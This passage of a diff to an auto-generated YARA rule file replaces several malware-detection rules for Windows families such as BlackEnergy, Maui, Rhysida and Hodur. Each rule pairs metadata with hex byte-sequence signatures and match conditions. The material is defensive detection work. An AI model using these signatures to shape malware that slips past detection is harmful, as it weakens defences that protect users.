 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b5f93aff-75da-58af-bf18-de683a7c9eb8"
+		id = "5d3d372c-0686-511d-bba6-815685b0b441"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.socksbot_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dexter_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "be6f7343dfb40a0e2f1dec96db93036928644c868cacce36ad5e92217ff2c80d"
+		logic_hash = "537f3a05b932c01193b62b9eef1199d3fcfbbcfba0cd35a2f7ef69253c025c83"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103107,32 +103305,32 @@ rule MALPEDIA_Win_Socksbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b750c 33ff 57 57 6a01 57 }
-		$sequence_1 = { ff15???????? 50 8945fc ff15???????? 8bd8 }
-		$sequence_2 = { 85c0 0f8488000000 03c7 8945f0 }
-		$sequence_3 = { ff15???????? 8bd0 33c9 85d2 7e22 53 }
-		$sequence_4 = { 0f8e22010000 6a20 57 c6043e00 e8???????? 59 }
-		$sequence_5 = { 754f 0fb67304 56 8d4305 50 8d85f0feffff }
-		$sequence_6 = { 50 e8???????? 83c40c 84c0 0f8485000000 6800040000 e8???????? }
-		$sequence_7 = { ff758c e8???????? 8bd8 59 85db 7441 8b4dfc }
-		$sequence_8 = { 8b75fc 53 ff15???????? 57 e8???????? }
-		$sequence_9 = { 8d4609 50 8d4508 50 e8???????? 83c40c 8b7dfc }
+		$sequence_0 = { b801000000 eb0d 8b4dfc 83c101 894dfc ebc8 33c0 }
+		$sequence_1 = { 68???????? 68???????? e8???????? 83c40c 68???????? a1???????? 50 }
+		$sequence_2 = { e8???????? 83c410 8b4508 50 8b4d10 }
+		$sequence_3 = { ff15???????? e9???????? 6a59 ff15???????? 85c0 7514 }
+		$sequence_4 = { ff15???????? 50 8b45fc 50 68???????? }
+		$sequence_5 = { 6a00 6a00 68???????? ff15???????? 6a02 }
+		$sequence_6 = { 52 e8???????? 83c404 0fbec0 83e857 }
+		$sequence_7 = { 6a06 8b15???????? 52 ff15???????? a3???????? c705????????00000000 6a01 }
+		$sequence_8 = { 85c0 7414 68???????? 8b4d08 51 }
+		$sequence_9 = { a3???????? 833d????????00 0f85bc000000 e8???????? a3???????? 6808020000 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Blackenergy_Auto : FILE
+rule MALPEDIA_Win_Maui_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "75f134c5-71b6-5322-a009-b31d954d7d23"
+		id = "fae207f4-bee0-581e-92b7-618fcd87980f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackenergy_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maui"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.maui_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "1873575f4ba8e3b3e090543b90afdc434ae43dfa997f5bef2241328cdcb2b4cc"
+		logic_hash = "c832f22e1bbb1398fc1d6a8199e3732cb12b403d9a2eb2103c84e67dba24e6f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103146,32 +103344,32 @@ rule MALPEDIA_Win_Blackenergy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 ffd7 8b4508 8b7df0 }
-		$sequence_1 = { 895dec 895df8 895df0 e8???????? 8b0d???????? }
-		$sequence_2 = { 894dac 81f900c00000 0f862a020000 b809000000 81f900000100 0f860f010000 }
-		$sequence_3 = { 8b07 83c014 50 8d45f4 }
-		$sequence_4 = { 66c745f86500 e8???????? c9 c3 55 }
-		$sequence_5 = { 8b4e14 3bd1 7602 8bca 394d08 7339 8b4d08 }
-		$sequence_6 = { 742a 3bc2 7426 895028 395120 }
-		$sequence_7 = { ff75f4 6801000080 ffd0 85c0 }
-		$sequence_8 = { 8bec 83ec10 8b0b 8b4508 8365f800 2bc1 83e804 }
-		$sequence_9 = { 83ec48 6a04 8d45fc 50 8d45e8 50 8d45b8 }
+		$sequence_0 = { 8bc8 23c7 f7d1 23cd 8b6c2438 0bc8 8bd6 }
+		$sequence_1 = { e8???????? a1???????? 33c4 898424bc000000 8b8424c4000000 8b8c24d0000000 8b9424d4000000 }
+		$sequence_2 = { 309630934b00 46 3bf3 7202 33f6 8d50ff 3bd7 }
+		$sequence_3 = { 743b 8b4910 85c9 7434 8b9c24ec000000 8bf0 894c2428 }
+		$sequence_4 = { 0f84c5fdffff 8b4c2440 b801000000 85c9 0f84b8fdffff 8b542418 }
+		$sequence_5 = { 6814030000 68???????? 6a44 e9???????? 6822030000 68???????? 6a41 }
+		$sequence_6 = { 83c414 5f 5e c3 8b542414 8b460c 52 }
+		$sequence_7 = { 89442418 e8???????? 8b4c2418 83c408 c744241001000000 3bc8 7408 }
+		$sequence_8 = { 83c414 eb49 8b4714 56 68d0020000 83c008 68???????? }
+		$sequence_9 = { 755a 6852010000 68???????? 6a20 6a69 6a21 e8???????? }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 1616896
 }
-rule MALPEDIA_Win_Revenant_Auto : FILE
+rule MALPEDIA_Win_Dispcashbr_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "89f91ed8-a64f-59de-9aac-43302ffc4c4f"
+		id = "70fd1e85-83ca-549b-b752-3572dac97120"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenant"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.revenant_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dispcashbr_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "3200938fd857c1394fb14151a6f831277638c7dab5ca1a4886284fcf19cad884"
+		logic_hash = "1d5a00b182201f928fd4d6b3f1036a475f5957d210fb4c8d3527862a6527bc4d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103185,34 +103383,34 @@ rule MALPEDIA_Win_Revenant_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4889442458 4c8b4c2458 488d442470 41b800040000 4889d9 }
-		$sequence_1 = { 48ffc7 e8???????? ebe4 488d0d26370000 e8???????? 448b442428 4889f1 }
-		$sequence_2 = { 488d0d12260000 4989c1 e8???????? 488b742428 b902000000 e8???????? }
-		$sequence_3 = { 4889ef 4989c0 e8???????? 488b4c2428 31c0 f3aa 4889e9 }
-		$sequence_4 = { 7408 4889c7 4889d9 f3a4 }
-		$sequence_5 = { 488d0d28380000 89c2 e8???????? 4885f6 0f84b4000000 }
-		$sequence_6 = { e8???????? 418b542420 4889d9 e8???????? 488d542420 4989f0 }
-		$sequence_7 = { 4889c2 4889442420 7424 448b442428 31c9 }
-		$sequence_8 = { 4c89c2 7208 035008 4839d1 72ac 4883c028 4c39c8 }
-		$sequence_9 = { 448b442428 4889f1 488b542420 488d3d40370000 488d2d08370000 4c8d2520370000 }
+		$sequence_0 = { e8???????? 83ec08 c7442408ceffffff c7442404???????? }
+		$sequence_1 = { e8???????? 83ec08 c7442408eaffffff c7442404???????? }
+		$sequence_2 = { 83ec04 c744240404000000 890424 e8???????? 83ec08 c7442408d9ffffff c7442404???????? }
+		$sequence_3 = { c744240404000000 890424 e8???????? 83ec08 c7442408f3ffffff c7442404???????? }
+		$sequence_4 = { e8???????? 83ec04 c744240404000000 890424 e8???????? 83ec08 c7442408ceffffff }
+		$sequence_5 = { 83ec08 c7442408caffffff c7442404???????? a1???????? 83c020 890424 e8???????? }
+		$sequence_6 = { c7442408c8ffffff c7442404???????? a1???????? 83c020 890424 e8???????? }
+		$sequence_7 = { 890424 e8???????? eb45 c70424f5ffffff }
+		$sequence_8 = { 83ec08 c7442408ccffffff c7442404???????? a1???????? }
+		$sequence_9 = { e8???????? 83ec08 c7442408ccffffff c7442404???????? }
 
 	condition:
-		7 of them and filesize < 99328
+		7 of them and filesize < 123904
 }
-rule MALPEDIA_Win_Ransoc_Auto : FILE
+rule MALPEDIA_Win_Grease_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c55d5df4-572b-5c0c-9b0c-3a567923b39b"
+		id = "afd291db-bac5-5fe7-9f54-1a39c18ec08a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ransoc_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grease_auto.yar#L1-L226"
 		license_url = "N/A"
-		logic_hash = "9e4916ca4af80e938f133184e5caea93df6c13b83aeab910e5de3e08f2b95d7e"
+		logic_hash = "a7bbee8fe2b545d42dcf93b28bc05e2b116dcf88de40c793a23d0b5cc4cea918"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -103224,32 +103422,45 @@ rule MALPEDIA_Win_Ransoc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7478 8bd7 8d4c2430 2bd0 3bf9 }
-		$sequence_1 = { 85d2 7403 894238 85c0 7415 397030 7508 }
-		$sequence_2 = { 895038 8bd0 8bc7 8bfa 89583c }
-		$sequence_3 = { 5e 895004 8b542428 5d 894808 5b }
-		$sequence_4 = { 8b742414 8916 894234 895038 8bd0 8bc7 8bfa }
-		$sequence_5 = { 3b780c 7508 8b7910 3b7810 7f2c 3bd6 }
-		$sequence_6 = { 8b5034 895134 8b4834 85c9 7406 8b5030 895130 }
-		$sequence_7 = { 0f8434020000 8b4830 3bca 7571 }
-		$sequence_8 = { 8b4e2c 751b f6c101 7516 }
-		$sequence_9 = { 895134 8b4834 85c9 7406 8b5030 895130 8b482c }
+		$sequence_0 = { 52 50 683f000f00 50 50 50 }
+		$sequence_1 = { 4533c0 488bd3 c744242804000000 4889442420 ff15???????? 488b4c2450 ff15???????? }
+		$sequence_2 = { 488d542470 41b93f000f00 4533c0 48c7c102000080 }
+		$sequence_3 = { 488b4c2460 48897c2440 488d442450 4889442438 }
+		$sequence_4 = { 4533c9 4533c0 4889442420 ff15???????? 85c0 7537 }
+		$sequence_5 = { 85c0 7534 488b4c2450 488d442458 41b904000000 4533c0 488bd3 }
+		$sequence_6 = { 4889442438 48897c2430 4533c0 c74424283f000f00 897c2420 }
+		$sequence_7 = { 48c7c102000080 c74424281f000200 895c2420 ff15???????? 85c0 0f85e7000000 488b4c2460 }
+		$sequence_8 = { 48895c2440 48895c2458 895c2460 48895c2468 }
+		$sequence_9 = { 75f7 2bc2 8bd0 8d442424 }
+		$sequence_10 = { f2ae f7d1 49 52 8d440902 8d8c242c010000 }
+		$sequence_11 = { 68???????? 51 e8???????? 83c40c 53 8d942438050000 52 }
+		$sequence_12 = { 51 889c244c050000 e8???????? 83c418 53 }
+		$sequence_13 = { 756f 68dc000000 8d94245c040000 53 }
+		$sequence_14 = { 68???????? 52 c744243804000000 ff15???????? 85c0 }
+		$sequence_15 = { 50 e8???????? 8b35???????? 83c438 6a00 8d8c240c010000 51 }
+		$sequence_16 = { 7405 80443420e0 46 3bf7 0f82eafdffff }
+		$sequence_17 = { 52 6a04 53 68???????? 50 895c242c ffd5 }
+		$sequence_18 = { 3c5a 7708 0420 8bcb 88443420 33c0 8a443420 }
+		$sequence_19 = { c684342406000063 e9???????? c68434240600006c e9???????? }
+		$sequence_20 = { ff249560424000 c68434140200006d e9???????? c684341402000071 }
+		$sequence_21 = { e9???????? c644341465 e9???????? c644341475 }
+		$sequence_22 = { ff15???????? 85c0 7529 8b4c2410 }
 
 	condition:
-		7 of them and filesize < 958464
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Grimplant_Auto : FILE
+rule MALPEDIA_Win_Minitypeframe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "00b5fa06-fa9c-594f-a510-4c191fcf8f32"
+		id = "40e88a96-d1cd-5006-9a0d-53fcc15d287e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grimplant_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minitypeframe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.minitypeframe_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "cbccd823b10050710a9d07b6e6e07157320e71de997cbe30ef0383cab26da835"
+		logic_hash = "8864a5220eda366ec3f0b791c455ecd5bc17a2ac1068453ffa5046f89df1e064"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103263,34 +103474,34 @@ rule MALPEDIA_Win_Grimplant_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb3d 0f108424a8000000 0f11842468010000 4c8b942480000000 488b542438 4c8b642430 488b842490000000 }
-		$sequence_1 = { e8???????? 90 88442418 885c2419 884c241a 48897c2420 4889742428 }
-		$sequence_2 = { ffd1 488bac2460010000 4881c468010000 c3 488b842470010000 6690 e8???????? }
-		$sequence_3 = { eb0f 4889c7 488d1537941c00 e8???????? 488d053cdd1300 488b9c24c0000000 488d0d15f31e00 }
-		$sequence_4 = { ffd2 4885db 0f8ec4000000 488b4c2470 488b5130 488b442478 ffd2 }
-		$sequence_5 = { e8???????? 488b942490000000 48895010 833d????????00 7517 488bb42498000000 48897018 }
-		$sequence_6 = { ffd1 b905000000 4889c7 4889de 31c0 488d1de47e3900 e8???????? }
-		$sequence_7 = { eb20 488d7830 488b4c2470 0f1f440000 e8???????? 488b7c2440 e8???????? }
-		$sequence_8 = { 8d0cc9 8d4940 48c1e906 4801c1 488b542438 48010a b801000000 }
-		$sequence_9 = { eb23 4889c1 48c1e004 488d15882e9000 48c7040200000000 48c744020800000000 488d4101 }
+		$sequence_0 = { 85c0 750d c744246c87010000 e9???????? 83fb21 753b 8b44245c }
+		$sequence_1 = { 50 8d542434 51 52 e8???????? 83c41c 8d44241c }
+		$sequence_2 = { c684248c00000034 c684248d000000a3 c684248e00000038 c684248f00000037 c684249000000008 c68424910000007f c6842492000000c7 }
+		$sequence_3 = { 8d8c24fc000000 50 51 e8???????? 83c41c 8b86cc000000 85c0 }
+		$sequence_4 = { 7521 6a01 8d442410 6829800000 50 e8???????? 83c40c }
+		$sequence_5 = { 8d049560740a10 50 ff500c 83c40c 5e 83c41c c3 }
+		$sequence_6 = { 51 e8???????? 8d54243c 8d8424a4000000 52 50 }
+		$sequence_7 = { 895c2434 8b542444 8b44245c 89542464 }
+		$sequence_8 = { 8b542454 894c2434 8b0d???????? 89442430 8b442458 51 57 }
+		$sequence_9 = { 8d8c24c8000000 85c9 7421 8d9424c8000000 55 52 e8???????? }
 
 	condition:
-		7 of them and filesize < 19940352
+		7 of them and filesize < 1589248
 }
-rule MALPEDIA_Win_Xxmm_Auto : FILE
+rule MALPEDIA_Win_Rm3_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "16a9d672-e06b-5e77-adaf-431f4123e535"
+		id = "b9c899fd-24b6-544d-a199-56585ec67459"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xxmm_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rm3_auto.yar#L1-L368"
 		license_url = "N/A"
-		logic_hash = "c8c4a142f2bfee52addd60a0f4c2035a9a8040f793cfe3829a4504cc749982c2"
+		logic_hash = "1f5fb30680a7291833cb3efcb87bc5516507b42236b00016cdde1fb7cc527979"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -103302,32 +103513,62 @@ rule MALPEDIA_Win_Xxmm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c9 7451 53 56 57 }
-		$sequence_1 = { 0fb6d2 7206 8d7c17e0 eb02 }
-		$sequence_2 = { 8b4c111c 8d0481 8b0410 03c2 eb12 8b07 }
-		$sequence_3 = { 4f 81cf00ffffff 47 8d040f 0fb610 035510 81e2ff000080 }
-		$sequence_4 = { e8???????? 8d1c07 8b7320 8bcf e8???????? }
-		$sequence_5 = { 5b c3 53 8d5804 e8???????? ff33 }
-		$sequence_6 = { 8b440878 8b7c0820 8b540824 03f9 03d1 8955f8 }
-		$sequence_7 = { 0f8481000000 8b96a0000000 0355f8 8b4204 }
-		$sequence_8 = { 8b540e1c 8d0482 03c1 81fb8e4e0eec 7509 8b00 03c1 }
-		$sequence_9 = { 47 8d040f 0fb610 035510 }
+		$sequence_0 = { 8b4508 3b460c 7247 8b7938 }
+		$sequence_1 = { 8b413c 8d5418ff eb0a 8b4138 8b5608 8d5410ff 48 }
+		$sequence_2 = { 0fb74106 8365f800 53 8945fc 0fb74114 56 }
+		$sequence_3 = { 85c0 7505 3945fc 759f }
+		$sequence_4 = { 8b7938 8b4608 8b513c 8b5e10 8d4438ff }
+		$sequence_5 = { 56 57 8d740818 8b4508 }
+		$sequence_6 = { 03c2 394508 7303 8975f8 }
+		$sequence_7 = { 897104 8b4808 ff7004 034c240c }
+		$sequence_8 = { 894510 56 8bc3 8d8d68ffffff 8bd6 e8???????? 2907 }
+		$sequence_9 = { 8b4514 e8???????? 8b5508 57 8bc3 8d8d58feffff }
+		$sequence_10 = { 8b3d???????? 8365fc00 8d45fc 50 6a00 }
+		$sequence_11 = { 897df8 e8???????? 8b4d0c 57 8bc6 8d9558feffff }
+		$sequence_12 = { 8bec 51 8365fc00 56 8d4508 50 }
+		$sequence_13 = { e8???????? 2bf3 89750c 0f88b3000000 8d3c1e 8dbcbd58feffff 837dfcff }
+		$sequence_14 = { ff750c 8d8d6cfeffff 50 e8???????? 8d8578ffffff 50 8bc6 }
+		$sequence_15 = { 8d9568ffffff e8???????? 85c0 7c15 ff4510 }
+		$sequence_16 = { 41bc01000000 eb07 3d002f0000 750c }
+		$sequence_17 = { 8d480f e8???????? 448b4f20 4c8b4728 }
+		$sequence_18 = { 488bd7 b9a63eff51 e8???????? 4885c0 7423 4c8d442448 33d2 }
+		$sequence_19 = { 33d2 41b80c030000 ff15???????? 4885c0 4c8be0 }
+		$sequence_20 = { 4883c604 03f8 0fb6442431 443be0 72cf }
+		$sequence_21 = { 448d443616 33d2 ff15???????? 4885c0 488bf0 0f84bd000000 488bcb }
+		$sequence_22 = { 8b01 4183c001 4883c104 48014268 }
+		$sequence_23 = { 4881ecc0000000 488b0d???????? 418bd8 8bfa }
+		$sequence_24 = { 83c404 8b0d???????? 50 8b85d4fbffff 50 6a17 }
+		$sequence_25 = { 8b8500ffffff 8a8c0574ffffff 8a940556ffffff 28ca 88940556ffffff 83c001 }
+		$sequence_26 = { 898d64ffffff e8???????? 8d45dc 8b30 8b7804 8b5808 }
+		$sequence_27 = { e8???????? 8b45b4 8b483c 890c24 c744240400000000 8b4db0 }
+		$sequence_28 = { 8945b8 894db4 8955b0 897dac 8975a8 0f84b5000000 }
+		$sequence_29 = { 898d6cffffff 899d68ffffff 89bd64ffffff 898560ffffff e9???????? }
+		$sequence_30 = { 8b45a0 01d8 8b5924 89855cffffff 89d8 }
+		$sequence_31 = { 8b8d6cffffff 894c2404 898558ffffff e8???????? }
+		$sequence_32 = { 89462c 890c24 c744240400000000 8955d0 e8???????? }
+		$sequence_33 = { 898558ffffff 89d8 c1e81f c1eb1d 83e301 }
+		$sequence_34 = { 8b15???????? 8985e8fdffff 898de4fdffff ffd2 }
+		$sequence_35 = { eb16 8a8563ffffff a801 755c eb00 31c0 }
+		$sequence_36 = { c744240400000000 8955d4 e8???????? 8d0d96318702 }
+		$sequence_37 = { 8985e8fbffff ffd1 8b0d???????? 6a00 6800000080 6a00 6a00 }
+		$sequence_38 = { 8b3e 83c618 81ff50450000 0f44d6 8b7580 81ff50450000 89c7 }
+		$sequence_39 = { 8b4870 894de0 8b4874 894de4 8b4868 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Rhysida_Auto : FILE
+rule MALPEDIA_Win_Comlook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b37d7cef-6bec-51b1-8798-0b8311f7db61"
+		id = "2593fda3-f25f-5e4e-aea3-f7267ae6a193"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhysida"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rhysida_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comlook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.comlook_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "25239cc1b2d1119e4ce01e339bf005e03f9d77aa5443040b6232d8bc07fad544"
+		logic_hash = "f2d9544219cd4dfd907ec20f4f40e3ff7dc0abab6b393777aed6489d1acbc463"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103341,32 +103582,32 @@ rule MALPEDIA_Win_Rhysida_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c21f8 488903 4c89d8 4c0face03c 4889c3 4c89d0 4d8b28 }
-		$sequence_1 = { 8b45f0 0145fc 8b45fc 3b45f4 7cbb 8b45f4 83c002 }
-		$sequence_2 = { 85c0 8944242c 0f8582000000 488b4c2438 ff5720 8b44242c 4883c440 }
-		$sequence_3 = { f30f1045d4 f30f1145d0 f30f1045d0 f30f1145cc 90 488d55cc 488d45d8 }
-		$sequence_4 = { 85c0 740c c7452c00000000 e9???????? 488b4500 8b4014 85c0 }
-		$sequence_5 = { 8b5010 8b45dc 01d0 f30f2ac0 f30f594514 f30f58450c 488b45f8 }
-		$sequence_6 = { 4883c002 4889c1 e8???????? 668945f4 488b4510 4883c004 488945e8 }
-		$sequence_7 = { e8???????? b801000000 4881c4a0110000 5d c3 55 57 }
-		$sequence_8 = { 4801d1 4801d0 41d1e9 660f6f01 458d51ff ba10000000 0f1100 }
-		$sequence_9 = { 85c0 75ca 4889ea 4889d9 e8???????? 83c001 7448 }
+		$sequence_0 = { e9???????? 68???????? 68???????? 8b4df8 8b5178 52 e8???????? }
+		$sequence_1 = { 8d15ec260810 e8???????? 58 5a 83c418 3bec e8???????? }
+		$sequence_2 = { c644241601 eb28 80be5006000000 740b 8bce e8???????? 84c0 }
+		$sequence_3 = { eb95 c745b4ffffffff c745a4ffffffff c745b800000000 c745a800000000 c78574ffffff00000000 eb0f }
+		$sequence_4 = { e9???????? 8d7c242c e8???????? b302 8d742424 885c2448 e8???????? }
+		$sequence_5 = { e8???????? 8b5308 895608 c645fc03 8d7e0c c70700000000 c7470400000000 }
+		$sequence_6 = { ffd0 3bf4 e8???????? 8945c8 837dc800 740a b804000000 }
+		$sequence_7 = { c781384a000000000000 8b5508 c782404a000000000000 8b45f8 50 8b4d08 51 }
+		$sequence_8 = { eb07 c745e000000000 8d4dd4 51 6800400000 8b550c 52 }
+		$sequence_9 = { eb0c 8b4d0c 8b510c 899558ffffff 8b4510 8b8d58ffffff 894808 }
 
 	condition:
-		7 of them and filesize < 2369536
+		7 of them and filesize < 4553728
 }
-rule MALPEDIA_Win_Ufrstealer_Auto : FILE
+rule MALPEDIA_Win_Electric_Powder_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "363b32bd-9a61-5367-b5d5-54daf961a4ad"
+		id = "1eede688-bf8f-5498-af13-fe892853a3bd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ufrstealer_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.electric_powder_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "df31fc542afebf5a6b78b056f78a762c74ccc9e30af24ef9561e9985cdd6d298"
+		logic_hash = "fd0dece583cd040033ee5a2fac814b92bb57f2cacae42d60f0a3caee41692c62"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103380,32 +103621,32 @@ rule MALPEDIA_Win_Ufrstealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb68 68???????? 68???????? ff15???????? 68???????? 68???????? ff15???????? }
-		$sequence_1 = { 0f8539010000 c745e000000000 c745d400020000 c745d800020000 8d45d8 50 68???????? }
-		$sequence_2 = { 8305????????04 b114 8b15???????? a1???????? 0fadd0 a3???????? }
-		$sequence_3 = { ff15???????? 85c0 0f8495e6ffff a3???????? 68???????? ff35???????? }
-		$sequence_4 = { ff5228 85c0 7527 8b55fc 6a00 6a00 }
-		$sequence_5 = { 0f84e0020000 8945e0 2b45e4 ff75e4 ff15???????? 50 }
-		$sequence_6 = { e8???????? 68???????? e8???????? 648f0500000000 83c404 6a00 }
-		$sequence_7 = { ff15???????? a1???????? c9 c3 55 8bec 83c4d8 }
-		$sequence_8 = { ff35???????? ff15???????? 85c0 0f847de9ffff a3???????? 68???????? }
-		$sequence_9 = { 33c0 c9 c20400 55 8bec 68???????? ff15???????? }
+		$sequence_0 = { 50 e8???????? 8bf0 83c404 85f6 0f84f4000000 8b8d40efffff }
+		$sequence_1 = { e8???????? 8d8d70fbffff c645fc4e 51 8bd0 8d8d30fcffff e8???????? }
+		$sequence_2 = { 8d85d8f9ffff 83c418 8985dceeffff 6a0c 8d85d4eeffff 50 }
+		$sequence_3 = { 6a02 52 56 8bcb ff5508 8bc8 ebe1 }
+		$sequence_4 = { 8d4738 50 51 8d8d98efffff }
+		$sequence_5 = { 2bc2 8955fc 83f801 0f82ff000000 8b7e14 8d5a01 83cb0f }
+		$sequence_6 = { 8bc1 57 8b5e10 2bc3 895df8 3bc2 0f82e9000000 }
+		$sequence_7 = { 8bce 50 e8???????? 84c0 7511 5e c70301000000 }
+		$sequence_8 = { c6854fefffff00 8d8d80efffff e8???????? 8a854fefffff 8b4df4 64890d00000000 59 }
+		$sequence_9 = { 8d3400 8945e8 56 51 8d45d8 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 770048
+		7 of them and filesize < 565248
 }
-rule MALPEDIA_Win_Aperetif_Auto : FILE
+rule MALPEDIA_Win_Hodur_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "795b83b3-4cb3-590f-beec-45294ced14b3"
+		id = "1836cfc6-54d1-596d-bd26-13def8f48ebb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aperetif"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aperetif_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hodur"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hodur_auto.yar#L1-L134"
 		license_url = "N/A"
